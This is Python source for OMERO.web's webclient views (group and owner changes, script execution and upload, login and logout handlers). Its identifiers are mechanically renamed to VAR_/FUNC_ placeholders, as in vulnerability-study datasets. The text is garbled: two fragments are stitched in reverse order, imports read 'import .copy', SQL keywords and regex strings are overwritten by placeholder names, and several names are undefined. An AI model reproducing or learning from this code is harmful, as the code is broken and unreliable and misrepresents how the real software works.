VAR_304 = [VAR_318.id for VAR_318 in VAR_362.listChildren()]
VAR_411, VAR_412 = FUNC_88(VAR_304)
VAR_371.append({"name": VAR_362.getName(), "imageTags": VAR_411})
VAR_164.extend(VAR_412)
VAR_372 = VAR_371[0]["name"]
else:
VAR_411, VAR_412 = FUNC_88(VAR_212)
VAR_371.append({"name": "images", "imageTags": VAR_411})
VAR_164.extend(VAR_412)
VAR_413 = VAR_5.getObject("Image", VAR_212[0]).getParent()
VAR_372 = VAR_413.getName() or "Thumbnail Figure"
VAR_53["parent_id"] = VAR_413.getId()
VAR_373 = set() # remove duplicates
VAR_374 = []
for VAR_433 in VAR_164:
if VAR_433.id not in VAR_373:
VAR_374.append(VAR_433)
VAR_373.add(VAR_433.id)
VAR_374.sort(VAR_310=lambda x: x.getTextValue().lower())
VAR_53["thumbSets"] = VAR_371
VAR_53["tags"] = VAR_374
VAR_53["figureName"] = VAR_372.replace(" ", "_")
elif VAR_43 == "MakeMovie":
VAR_328 = "/omero/export_scripts/Make_Movie.py"
VAR_54 = "webclient/VAR_203/make_movie.html"
VAR_142 = VAR_5.getObject("Image", VAR_212[0])
VAR_414 = VAR_142.getName().rsplit(".", 1)
if len(VAR_414) > 1 and len(VAR_414[1]) > 3:
VAR_414 = ".".join(VAR_414)
else:
VAR_414 = movieName[0]
VAR_53["movieName"] = os.path.basename(VAR_414)
VAR_282 = []
for VAR_383 in VAR_142.getChannels():
VAR_282.append(
{
"active": VAR_383.isActive(),
"color": VAR_383.getColor().getHtml(),
"label": VAR_383.getLabel(),
}
)
VAR_53["channels"] = VAR_282
VAR_53["sizeT"] = VAR_142.getSizeT()
VAR_53["sizeZ"] = VAR_142.getSizeZ()
VAR_202 = VAR_5.getScriptService()
VAR_42 = VAR_202.getScriptID(VAR_328)
if VAR_42 < 0:
raise AttributeError("No script found for VAR_314 '%s'" % VAR_328)
VAR_53["template"] = VAR_54
VAR_53["scriptId"] = VAR_42
return VAR_53
@login_required()
@render_response()
def FUNC_69(VAR_2, VAR_27, VAR_5=None, **VAR_6):
VAR_216 = {}
for VAR_215 in ("Image", "Dataset", "Project"):
VAR_187 = VAR_2.GET.get(VAR_215, None)
if VAR_187 is not None:
VAR_216[VAR_215] = [int(VAR_318) for VAR_318 in VAR_187.split(",")]
VAR_217 = VAR_5.getContainerService().getImagesBySplitFilesets(
VAR_216, None, VAR_5.SERVICE_OPTS
)
VAR_218 = []
for fsId, splitIds in VAR_217.items():
VAR_218.append(
{
"id": fsId,
"attempted_iids": splitIds[True],
"blocking_iids": splitIds[False],
}
)
VAR_53 = {"split_filesets": VAR_218}
VAR_53["action"] = VAR_27
if VAR_27 == "chgrp":
VAR_53["action"] = "move"
VAR_53["template"] = "webclient/FUNC_62/" "fileset_check_dialog_content.html"
return VAR_53
def FUNC_70(
VAR_5, VAR_44, VAR_45, VAR_46, VAR_47, VAR_48, VAR_11
):
VAR_73 = omero.sys.ParametersI()
VAR_74 = VAR_5.getQueryService()
VAR_44 = set(VAR_44)
VAR_45 = set(VAR_45)
VAR_46 = set(VAR_46)
VAR_219 = set([])
VAR_48 = set(VAR_48)
VAR_47 = set(VAR_47)
if VAR_44:
VAR_73.map = {}
VAR_73.map["pids"] = rlist([rlong(x) for x in list(VAR_44)])
VAR_75 = """
select pdlink.child.id
from ProjectDatasetLink pdlink
where pdlink.parent.id in (:pids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_5.SERVICE_OPTS):
VAR_45.add(e[0].val)
if VAR_47:
VAR_73.map = {}
VAR_73.map["sids"] = rlist([rlong(x) for x in VAR_47])
VAR_75 = """
select splink.child.id
from ScreenPlateLink splink
where splink.parent.id in (:sids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_5.SERVICE_OPTS):
VAR_48.add(e[0].val)
if VAR_45:
VAR_73.map = {}
VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
VAR_75 = """
select dilink.child.id,
dilink.child.fileset.id
from DatasetImageLink dilink
where dilink.parent.id in (:dids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_5.SERVICE_OPTS):
VAR_46.add(e[0].val)
if e[1] is not None:
VAR_219.add(e[1].val)
if VAR_48:
VAR_73.map = {}
VAR_73.map["plids"] = rlist([rlong(x) for x in VAR_48])
VAR_75 = """
select ws.image.id
from WellSample ws
join ws.plateAcquisition pa
where pa.plate.id in (:plids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_5.SERVICE_OPTS):
VAR_46.add(e[0].val)
if VAR_219:
VAR_73.map = {}
VAR_73.map["fsids"] = rlist([rlong(x) for x in VAR_219])
VAR_75 = """
select VAR_142.id
from Image VAR_142
left outer join VAR_142.datasetLinks dilink
where VAR_142.fileset.id in (select VAR_365.id
from Image im
join im.fileset VAR_365
where VAR_365.id in (:fsids)
VAR_101 by VAR_365.id
having count(im.id)>1)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_5.SERVICE_OPTS):
VAR_46.add(e[0].val)
VAR_220 = set([])
VAR_221 = False
if VAR_46:
VAR_73.map = {
"iids": rlist([rlong(x) for x in VAR_46]),
}
VAR_330 = ""
if VAR_45:
VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
VAR_330 = """
and (
dilink.parent.id not in (:dids)
or dilink.parent.id = null
)
"""
VAR_75 = (
"""
select distinct dilink.parent.id
from Image VAR_142
left outer join VAR_142.datasetLinks dilink
where VAR_142.id in (:VAR_153)
%s
and (select count(dilink2.child.id)
from DatasetImageLink dilink2
where dilink2.parent.id = dilink.parent.id
and dilink2.child.id not in (:VAR_153)) = 0
"""
% VAR_330
)
for e in VAR_74.projection(VAR_75, VAR_73, VAR_5.SERVICE_OPTS):
if e:
VAR_220.add(e[0].val)
else:
VAR_221 = True
VAR_222 = set([])
if VAR_45:
VAR_73.map = {"dids": rlist([rlong(x) for x in VAR_45])}
VAR_331 = ""
if VAR_44:
VAR_73.map["pids"] = rlist([rlong(x) for x in VAR_44])
VAR_331 = "and pdlink.parent.id not in (:pids)"
VAR_75 = (
"""
select distinct pdlink.parent.id
from ProjectDatasetLink pdlink
where pdlink.child.id in (:dids)
%s
and (select count(pdlink2.child.id)
from ProjectDatasetLink pdlink2
where pdlink2.parent.id = pdlink.parent.id
and pdlink2.child.id not in (:dids)) = 0
"""
% VAR_331
)
for e in VAR_74.projection(VAR_75, VAR_73, VAR_5.SERVICE_OPTS):
VAR_222.add(e[0].val)
VAR_223 = {
"remove": {
"project": list(VAR_44),
"dataset": list(VAR_45),
"screen": list(VAR_47),
"plate": list(VAR_48),
"image": list(VAR_46),
},
"childless": {
"project": list(VAR_222),
"dataset": list(VAR_220),
"orphaned": VAR_221,
},
}
return VAR_223
@require_POST
@login_required()
def FUNC_71(VAR_2, VAR_5=None, **VAR_6):
return FUNC_72(VAR_2, VAR_27="chgrp", VAR_5=conn, **VAR_6)
@require_POST
@login_required()
def FUNC_72(VAR_2, VAR_27, VAR_5=None, **VAR_6):
VAR_224 = {}
VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]
for VAR_215 in VAR_225:
VAR_154 = VAR_2.POST.get(VAR_215, None)
if VAR_154 is not None:
VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
VAR_224[VAR_215] = VAR_144
if VAR_27 == "chgrp":
VAR_332 = getIntOrDefault(VAR_2, "group_id", None)
elif VAR_27 == "chown":
VAR_332 = getIntOrDefault(VAR_2, "owner_id", None)
VAR_84 = VAR_5.submitDryRun(VAR_27, VAR_224, VAR_332)
VAR_198 = VAR_345(VAR_84)
return HttpResponse(VAR_198)
@login_required()
def FUNC_73(VAR_2, VAR_5=None, **VAR_6):
if not VAR_2.method == "POST":
return JsonResponse({"Error": "Need to POST to chgrp"}, VAR_313=405)
VAR_20 = getIntOrDefault(VAR_2, "group_id", None)
if VAR_20 is None:
return JsonResponse({"Error": "chgrp: No VAR_20 specified"})
VAR_20 = VAR_241(VAR_20)
def FUNC_86(VAR_71):
for VAR_433 in ["Dataset", "Image", "Plate"]:
VAR_187 = VAR_71.POST.get(VAR_433, None)
if VAR_187 is not None:
for o in list(VAR_5.getObjects(VAR_433, VAR_187.split(","))):
return o.getDetails().owner.id.val
VAR_101 = VAR_5.getObject("ExperimenterGroup", VAR_20)
VAR_226 = VAR_2.POST.get("new_container_name", None)
VAR_227 = VAR_2.POST.get("new_container_type", None)
VAR_228 = None
VAR_229 = FUNC_86(VAR_2)
VAR_5.SERVICE_OPTS.setOmeroUser(VAR_229)
if (
VAR_226 is not None
and len(VAR_226) > 0
and VAR_227 is not None
):
VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_20)
VAR_228 = VAR_5.createContainer(VAR_227, VAR_226)
if VAR_228 is None:
VAR_332 = VAR_2.POST.get("target_id", None)
VAR_228 = VAR_332 is not None and VAR_332.split("-")[1] or None
VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
for VAR_215 in VAR_225:
VAR_154 = VAR_2.POST.get(VAR_215, None)
if VAR_154 is not None:
VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
VAR_305 = VAR_2.POST.getlist("fileset")
if len(VAR_305) > 0:
if VAR_215 == "Dataset":
VAR_5.regroupFilesets(dsIds=VAR_144, VAR_305=fsIds)
else:
for VAR_365 in VAR_5.getObjects("Fileset", VAR_305):
VAR_144.extend([VAR_318.id for VAR_318 in VAR_365.copyImages()])
VAR_144 = list(set(VAR_144)) # remove duplicates
VAR_0.debug("chgrp to VAR_101:%s %s-%s" % (VAR_20, VAR_215, VAR_144))
VAR_84 = VAR_5.chgrpObjects(VAR_215, VAR_144, VAR_20, VAR_228)
VAR_198 = VAR_345(VAR_84)
VAR_2.session["callback"][VAR_198] = {
"job_type": "chgrp",
"group": VAR_101.getName(),
"to_group_id": VAR_20,
"dtype": VAR_215,
"obj_ids": VAR_144,
"job_name": "Change group",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
VAR_2.session.modified = True
VAR_44 = VAR_2.POST.get("Project", [])
VAR_45 = VAR_2.POST.get("Dataset", [])
VAR_46 = VAR_2.POST.get("Image", [])
VAR_47 = VAR_2.POST.get("Screen", [])
VAR_48 = VAR_2.POST.get("Plate", [])
if VAR_44:
project_ids = [VAR_241(x) for x in VAR_44.split(",")]
if VAR_45:
dataset_ids = [VAR_241(x) for x in VAR_45.split(",")]
if VAR_46:
image_ids = [VAR_241(x) for x in VAR_46.split(",")]
if VAR_47:
screen_ids = [VAR_241(x) for x in VAR_47.split(",")]
if VAR_48:
plate_ids = [VAR_241(x) for x in VAR_48.split(",")]
VAR_230 = FUNC_70(
VAR_5,
VAR_44,
VAR_45,
VAR_46,
VAR_47,
VAR_48,
VAR_2.session.get("user_id"),
)
return JsonResponse({"update": VAR_230})
@login_required()
def FUNC_74(VAR_2, VAR_5=None, **VAR_6):
if not VAR_2.method == "POST":
return JsonResponse({"Error": "Need to POST to chown"}, VAR_313=405)
VAR_231 = getIntOrDefault(VAR_2, "owner_id", None)
if VAR_231 is None:
return JsonResponse({"Error": "chown: No VAR_231 specified"})
VAR_231 = int(VAR_231)
VAR_232 = VAR_5.getObject("Experimenter", VAR_231)
if VAR_232 is None:
return JsonResponse({"Error": "chown: Experimenter not found" % VAR_231})
VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
VAR_233 = []
for VAR_215 in VAR_225:
VAR_154 = VAR_2.POST.get(VAR_215, None)
if VAR_154 is not None:
VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
VAR_0.debug("chown to VAR_103:%s %s-%s" % (VAR_231, VAR_215, VAR_144))
VAR_84 = VAR_5.chownObjects(VAR_215, VAR_144, VAR_231)
VAR_198 = VAR_345(VAR_84)
VAR_233.append(VAR_198)
VAR_2.session["callback"][VAR_198] = {
"job_type": "chown",
"owner": VAR_232.getFullName(),
"to_owner_id": VAR_231,
"dtype": VAR_215,
"obj_ids": VAR_144,
"job_name": "Change owner",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
VAR_2.session.modified = True
return JsonResponse({"jobIds": VAR_233})
@login_required(setGroupContext=True)
def FUNC_75(VAR_2, VAR_42, VAR_5=None, **VAR_6):
VAR_202 = VAR_5.getScriptService()
VAR_50 = {}
VAR_49 = VAR_241(VAR_42)
try:
VAR_73 = VAR_202.getParams(VAR_49)
except Exception as x:
if x.message and x.message.startswith("No processor available"):
VAR_174 = FUNC_78(VAR_2, VAR_5, VAR_49, VAR_50, VAR_43="Script")
return JsonResponse(VAR_174)
else:
raise
VAR_73 = VAR_202.getParams(VAR_49)
VAR_43 = VAR_73.name.replace("_", " ").replace(".py", "")
VAR_0.debug("Script: run with VAR_2.POST: %s" % VAR_2.POST)
VAR_234 = (
"file_annotation" in VAR_2.FILES and VAR_2.FILES["file_annotation"] or None
)
VAR_235 = None
if VAR_234 is not None and VAR_234 != "":
VAR_104 = BaseContainer(VAR_5)
VAR_235 = VAR_104.createFileAnnotations(VAR_234, [])
for VAR_310, VAR_320 in VAR_73.inputs.items():
VAR_333 = VAR_320.prototype
VAR_334 = VAR_333.__class__
if VAR_310 == "File_Annotation" and VAR_235 is not None:
VAR_50[VAR_310] = VAR_334(VAR_345(VAR_235))
continue
if VAR_334 == omero.rtypes.RBoolI:
VAR_375 = VAR_310 in VAR_2.POST
VAR_50[VAR_310] = VAR_334(VAR_375)
continue
if VAR_334.__name__ == "RMapI":
VAR_376 = "%s_key0" % VAR_310
VAR_377 = "%s_value0" % VAR_310
VAR_378 = 0
VAR_379 = {}
while VAR_376 in VAR_2.POST:
VAR_415 = VAR_345(VAR_2.POST[VAR_376])
VAR_416 = VAR_2.POST[VAR_377]
if len(VAR_415) > 0 and len(VAR_416) > 0:
VAR_379[VAR_345(VAR_415)] = VAR_416
VAR_378 += 1
VAR_376 = "%s_key%d" % (VAR_310, VAR_378)
VAR_377 = "%s_value%d" % (VAR_310, VAR_378)
if len(VAR_379) > 0:
VAR_50[VAR_310] = wrap(VAR_379)
continue
if VAR_310 in VAR_2.POST:
if VAR_334 == omero.rtypes.RListI:
VAR_417 = VAR_2.POST.getlist(VAR_310)
if len(VAR_417) == 0:
continue
if len(VAR_417) == 1: # process comma-separated list
if len(VAR_417[0]) == 0:
continue
VAR_417 = values[0].split(",")
VAR_418 = omero.rtypes.RStringI
VAR_419 = VAR_333.val # list
if len(VAR_419) > 0:
VAR_418 = VAR_419[0].__class__
if VAR_418 == int(1).__class__:
VAR_418 = omero.rtypes.rint
if VAR_418 == VAR_241(1).__class__:
VAR_418 = omero.rtypes.rlong
VAR_420 = []
for VAR_416 in VAR_417:
try:
VAR_38 = VAR_418(VAR_416.strip())
except Exception:
VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_310, VAR_416))
continue
if isinstance(VAR_38, omero.model.IObject):
VAR_420.append(omero.rtypes.robject(VAR_38))
else:
VAR_420.append(VAR_38)
VAR_50[VAR_310] = omero.rtypes.rlist(VAR_420)
else:
VAR_375 = VAR_2.POST[VAR_310]
if len(VAR_375) == 0:
continue
try:
VAR_50[VAR_310] = VAR_334(VAR_375)
except Exception:
VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_310, VAR_375))
continue
if "IDs" in VAR_50 and "Data_Type" in VAR_50:
VAR_335 = VAR_5.SERVICE_OPTS.getOmeroGroup()
VAR_5.SERVICE_OPTS.setOmeroGroup("-1")
try:
VAR_380 = VAR_5.getObject(
VAR_50["Data_Type"].val, unwrap(VAR_50["IDs"])[0]
)
VAR_381 = VAR_380.getDetails().group.id.val
VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_381)
except Exception:
VAR_0.debug(traceback.format_exc())
VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_335)
try:
VAR_0.debug("Running script %s with " "params %s" % (VAR_43, VAR_50))
except Exception:
pass
VAR_174 = FUNC_78(VAR_2, VAR_5, VAR_49, VAR_50, VAR_43)
return JsonResponse(VAR_174)
@login_required(isAdmin=True)
@render_response()
def FUNC_76(VAR_2, VAR_5=None, **VAR_6):
if VAR_2.method != "POST":
return {"template": "webclient/VAR_203/upload_script.html"}
VAR_236 = VAR_2.POST.get("script_path")
VAR_237 = VAR_2.FILES["script_file"]
VAR_237.seek(0)
VAR_238 = VAR_237.read().decode("utf-8")
if not VAR_236.endswith("/"):
VAR_236 = script_path + "/"
VAR_236 = script_path + VAR_237.name
VAR_202 = VAR_5.getScriptService()
VAR_239 = VAR_202.getScriptID(VAR_236)
try:
if VAR_239 > 0:
VAR_173 = OriginalFileI(VAR_239, False)
VAR_202.editScript(VAR_173, VAR_238)
VAR_382 = "Script Replaced: %s" % VAR_237.name
else:
VAR_239 = VAR_202.uploadOfficialScript(VAR_236, VAR_238)
VAR_382 = "Script Uploaded: %s" % VAR_237.name
except omero.ValidationException as ex:
VAR_382 = VAR_345(ex)
return {"Message": VAR_382, "script_id": VAR_239}
@require_POST
@login_required()
def FUNC_77(VAR_2, VAR_26, VAR_5=None, **VAR_6):
VAR_202 = VAR_5.getScriptService()
VAR_49 = VAR_202.getScriptID("/omero/export_scripts/Batch_Image_Export.py")
VAR_142 = VAR_5.getObject("Image", VAR_26)
if VAR_142 is not None:
VAR_335 = VAR_142.getDetails().group.id.val
VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_335)
VAR_212 = [VAR_241(VAR_26)]
VAR_50 = {
"Data_Type": wrap("Image"),
"IDs": rlist([rlong(id) for id in VAR_212]),
}
VAR_50["Format"] = wrap("OME-TIFF")
VAR_174 = FUNC_78(VAR_2, VAR_5, VAR_49, VAR_50, VAR_43="Create OME-TIFF")
return JsonResponse(VAR_174)
def FUNC_78(VAR_2, VAR_5, VAR_49, VAR_50, VAR_43="Script"):
VAR_2.session.modified = True
VAR_202 = VAR_5.getScriptService()
try:
VAR_84 = VAR_202.runScript(VAR_49, VAR_50, None, VAR_5.SERVICE_OPTS)
VAR_198 = VAR_345(VAR_84)
VAR_313 = "in progress"
VAR_2.session["callback"][VAR_198] = {
"job_type": "script",
"job_name": VAR_43,
"start_time": datetime.datetime.now(),
"status": VAR_313,
}
VAR_2.session.modified = True
except Exception as x:
VAR_198 = VAR_345(time()) # E.g. 1312803670.6076391
VAR_382 = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
if VAR_382 and VAR_382.startswith("No processor available"):
VAR_0.info(traceback.format_exc())
VAR_57 = "No Processor Available"
VAR_313 = "no processor available"
VAR_382 = "" # VAR_54 displays VAR_382 and VAR_344
else:
VAR_0.error(traceback.format_exc())
VAR_57 = traceback.format_exc()
VAR_313 = "failed"
VAR_382 = x.message
VAR_2.session["callback"][VAR_198] = {
"job_type": "script",
"job_name": VAR_43,
"start_time": datetime.datetime.now(),
"status": VAR_313,
"Message": VAR_382,
"error": VAR_57,
}
return {"status": VAR_313, "error": VAR_57}
return {"jobId": VAR_198, "status": VAR_313}
@login_required()
@render_response()
def FUNC_79(VAR_2, VAR_26, VAR_5=None, **VAR_6):
VAR_240 = list(
VAR_5.getAnnotationLinks(
"Image", [VAR_26], VAR_90=omero.constants.namespaces.NSOMETIFF
)
)
VAR_172 = {}
if len(VAR_240) > 0:
VAR_240.sort(VAR_310=lambda x: x.getId(), VAR_350=True)
VAR_336 = VAR_240[0]
VAR_293 = VAR_336.creationEventDate()
VAR_34 = VAR_336.getChild().getId()
from omeroweb.webgateway.templatetags.common_filters import ago
VAR_31 = VAR_350("download_annotation", args=[VAR_34])
VAR_172 = {
"created": VAR_345(VAR_293),
"ago": ago(VAR_293),
"id": VAR_34,
"download": VAR_31,
}
return VAR_172 # will FUNC_80 returned as json by VAR_4
|
import .copy
import os
import .datetime
import Ice
from Ice import Exception as IceException
import logging
import .traceback
import json
import .re
import sys
import warnings
from past.builtins import unicode
from future.utils import bytes_to_native_str
from django.utils.http import .is_safe_url
from time import .time
from omeroweb.version import .omeroweb_buildyear as build_year
from omeroweb.version import .omeroweb_version as omero_version
import .omero
import .omero.scripts
from omero.rtypes import wrap, unwrap, rlong, rlist
from omero.gateway.utils import .toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import (
Http404,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.utils.http import .urlencode
from django.core.urlresolvers import .reverse, NoReverseMatch
from django.utils.encoding import smart_str
from django.views.decorators.cache import .never_cache
from django.views.decorators.http import .require_POST
from django.shortcuts import .render
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import .views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
from omeroweb.webgateway.util import .get_longs as webgateway_get_longs
from omeroweb.feedback.views import .handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import .render_response
from omeroweb.webclient.show import (
Show,
IncorrectMenuError,
paths_to_object,
paths_to_tag,
)
from omeroweb.decorators import (
ConnCleaningHttpResponse,
parse_url,
TableClosingHttpResponse,
)
from omeroweb.webgateway.util import .getIntOrDefault
from omero.model import (
AnnotationAnnotationLinkI,
DatasetI,
DatasetImageLinkI,
ExperimenterI,
ImageI,
OriginalFileI,
PlateI,
ProjectI,
ProjectDatasetLinkI,
ScreenI,
ScreenPlateLinkI,
TagAnnotationI,
)
from omero import ApiUsageException, ServerError, CmdError
from omeroweb.webgateway.views import LoginView
from . import .tree
try:
import .long
except ImportError:
VAR_241 = int
VAR_0 = logging.getLogger(__name__)
VAR_0.info("INIT '%s'" % os.getpid())
VAR_1 = settings.PAGE * 100
def FUNC_0(VAR_2, VAR_3, VAR_4):
VAR_51 = None
VAR_52 = VAR_2.GET.get(VAR_3, VAR_4)
if VAR_52 is not None:
VAR_51 = VAR_241(VAR_52)
return VAR_51
def FUNC_1(VAR_2, VAR_3):
VAR_51 = VAR_2.GET.getlist(VAR_3)
return [VAR_318 for VAR_318 in VAR_51 if VAR_318 != ""]
def FUNC_2(VAR_2, VAR_3):
warnings.warn(
"Deprecated. Use omeroweb.webgateway.util.get_longs()", DeprecationWarning
)
return webgateway_get_longs(VAR_2, VAR_3)
def FUNC_3(VAR_2, VAR_3, VAR_4):
return toBoolean(VAR_2.GET.get(VAR_3, VAR_4))
def FUNC_4(VAR_5):
if not is_safe_url(VAR_5, allowed_hosts=settings.REDIRECT_ALLOWED_HOSTS):
VAR_5 = VAR_350("webindex")
return VAR_5
@never_cache
@render_response()
def FUNC_5(VAR_2, VAR_6=None, **VAR_7):
VAR_53 = {"version": omero_version, "build_year": build_year}
if settings.INDEX_TEMPLATE is not None:
try:
template_loader.get_template(settings.INDEX_TEMPLATE)
VAR_53["template"] = settings.INDEX_TEMPLATE
except Exception:
VAR_53["template"] = "webclient/VAR_93.html"
VAR_53["error"] = traceback.format_exception(*sys.exc_info())[-1]
else:
VAR_53["template"] = "webclient/VAR_93.html"
return VAR_53
class CLASS_0(LoginView):
VAR_54 = "webclient/login.html"
VAR_55 = "OMERO.web"
def FUNC_81(self, VAR_2):
return self.handle_not_logged_in(VAR_2)
def FUNC_82(self, VAR_2, VAR_6, VAR_56):
if VAR_2.session.get("active_group"):
if (
VAR_2.session.get("active_group")
not in VAR_6.getEventContext().memberOfGroups
):
del VAR_2.session["active_group"]
if VAR_2.session.get("user_id"):
del VAR_2.session["user_id"]
if VAR_2.session.get("server_settings"):
del VAR_2.session["server_settings"]
if VAR_2.POST.get("noredirect"):
return HttpResponse("OK")
VAR_5 = VAR_2.GET.get("url")
if VAR_5 is None or len(VAR_5) == 0:
try:
VAR_5 = parse_url(settings.LOGIN_REDIRECT)
except Exception:
VAR_5 = VAR_350("webindex")
else:
VAR_5 = FUNC_4(VAR_5)
return HttpResponseRedirect(VAR_5)
def FUNC_83(self, VAR_2, VAR_57=None, VAR_22=None):
if VAR_22 is None:
VAR_337 = VAR_2.GET.get("server", VAR_2.POST.get("server"))
if VAR_337 is not None:
VAR_115 = {"server": unicode(VAR_337)}
VAR_22 = LoginForm(VAR_115=initial)
else:
VAR_22 = LoginForm()
VAR_53 = {
"version": omero_version,
"build_year": build_year,
"error": VAR_57,
"form": VAR_22,
}
VAR_5 = VAR_2.GET.get("url")
if VAR_5 is not None and len(VAR_5) != 0:
VAR_53["url"] = urlencode({"url": VAR_5})
if hasattr(settings, "LOGIN_LOGO"):
VAR_53["LOGIN_LOGO"] = settings.LOGIN_LOGO
if settings.PUBLIC_ENABLED:
VAR_338 = VAR_350("webindex")
if settings.PUBLIC_URL_FILTER.search(VAR_338):
VAR_53["public_enabled"] = True
VAR_53["public_login_redirect"] = VAR_338
VAR_53["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
if settings.SHOW_CLIENT_DOWNLOADS:
VAR_339 = re.match(
(
r"(?P<major>\VAR_362+)\."
r"(?P<minor>\VAR_362+)\."
r"(?P<patch>\VAR_362+\.?)?"
r"(?P<dev>(dev|a|b|rc)\VAR_362+)?.*"
),
omero_version,
)
VAR_340 = "^VAR_414%s\\.%s\\.[^-]+$" % (
VAR_339.group("major"),
VAR_339.group("minor"),
)
VAR_53["client_download_tag_re"] = VAR_340
VAR_53["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
return render(VAR_2, self.template, VAR_53)
@login_required(ignore_login_fail=True)
def FUNC_6(VAR_2, VAR_6=None, **VAR_7):
return HttpResponse("OK")
@login_required()
def FUNC_7(VAR_2, VAR_6=None, VAR_5=None, **VAR_7):
FUNC_8(VAR_2)
VAR_5 = VAR_5 or VAR_350("webindex")
VAR_5 = FUNC_4(VAR_5)
return HttpResponseRedirect(VAR_5)
def FUNC_8(VAR_2, VAR_8=None):
if VAR_8 is None:
VAR_8 = VAR_2.GET.get("active_group")
VAR_8 = int(VAR_8)
if (
"active_group" not in VAR_2.session
or VAR_8 != VAR_2.session["active_group"]
):
VAR_2.session.modified = True
VAR_2.session["active_group"] = VAR_8
def FUNC_9(VAR_2, VAR_9="All members"):
VAR_58 = (
VAR_2.session.get("server_settings")
.get("ui", {})
.get("menu", {})
.get("dropdown", {})
.get("everyone", {})
.get("label", VAR_9)
)
return {
"id": -1,
"omeName": VAR_58,
"firstName": VAR_58,
"lastName": "",
}
@login_required(login_redirect="webindex")
def FUNC_10(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method == "POST":
try:
try:
VAR_6.close()
except Exception:
VAR_0.error("Exception during FUNC_10.", exc_info=True)
finally:
VAR_2.session.flush()
return HttpResponseRedirect(VAR_350(settings.LOGIN_VIEW))
else:
VAR_53 = {"url": VAR_350("weblogout"), "submit": "Do you want to log out?"}
VAR_54 = "webgateway/base/includes/post_form.html"
return render(VAR_2, VAR_54, VAR_53)
def FUNC_11(VAR_2, VAR_10, VAR_6=None, VAR_5=None, **VAR_7):
VAR_2.session.modified = True
VAR_54 = VAR_7.get("template", None)
if VAR_54 is None:
if VAR_10 == "userdata":
VAR_54 = "webclient/VAR_158/containers.html"
elif VAR_10 == "usertags":
VAR_54 = "webclient/VAR_158/containers.html"
else:
VAR_54 = "webclient/%s/%s.html" % (VAR_10, menu)
VAR_59 = VAR_7.get("show", Show(VAR_6, VAR_2, VAR_10))
try:
VAR_242 = VAR_59.first_selected
except IncorrectMenuError as e:
return HttpResponseRedirect(e.uri)
VAR_60 = VAR_59.initially_open_owner
if VAR_2.GET.get("show", None) is not None and VAR_242 is None:
if (
settings.PUBLIC_ENABLED
and settings.PUBLIC_USER == VAR_6.getUser().getOmeName()
):
return HttpResponseRedirect("%s?VAR_5=%s" % (VAR_350("weblogin"), VAR_5))
if VAR_242 is not None:
FUNC_8(VAR_2, VAR_242.details.group.id.val)
VAR_61 = {}
VAR_62 = GlobalSearchForm(VAR_158=VAR_2.GET.copy())
if VAR_10 == "search":
if VAR_62.is_valid():
VAR_61["query"] = VAR_62.cleaned_data["search_query"]
VAR_5 = VAR_7.get("load_template_url", None)
if VAR_5 is None:
VAR_5 = VAR_350(viewname="load_template", args=[VAR_10])
VAR_8 = VAR_2.session.get("active_group") or VAR_6.getEventContext().groupId
VAR_63, VAR_64 = VAR_6.getObject("ExperimenterGroup", VAR_8).groupSummary()
VAR_65 = [u.id for u in VAR_63]
VAR_65.extend([u.id for u in VAR_64])
VAR_66 = VAR_2.GET.get("experimenter")
if VAR_60 is not None:
if VAR_2.session.get("user_id", None) != -1:
VAR_66 = VAR_60
try:
VAR_66 = VAR_241(VAR_66)
except Exception:
VAR_66 = None
if VAR_66 is not None:
if (
VAR_66
not in (
set(map(lambda x: x.id, VAR_63)) | set(map(lambda x: x.id, VAR_64))
)
and VAR_66 != -1
):
VAR_66 = None
if VAR_66 is None:
VAR_66 = VAR_2.session.get("user_id", None)
if VAR_66 is None or int(VAR_66) not in VAR_65:
if VAR_66 != -1: # All VAR_166 in VAR_101 is allowed
VAR_66 = VAR_6.getEventContext().userId
VAR_2.session["user_id"] = VAR_66
VAR_67 = list(VAR_6.getGroupsMemberOf())
VAR_67.sort(VAR_310=lambda x: x.getName().lower())
VAR_68 = VAR_67
VAR_69 = ContainerForm()
VAR_70 = {}
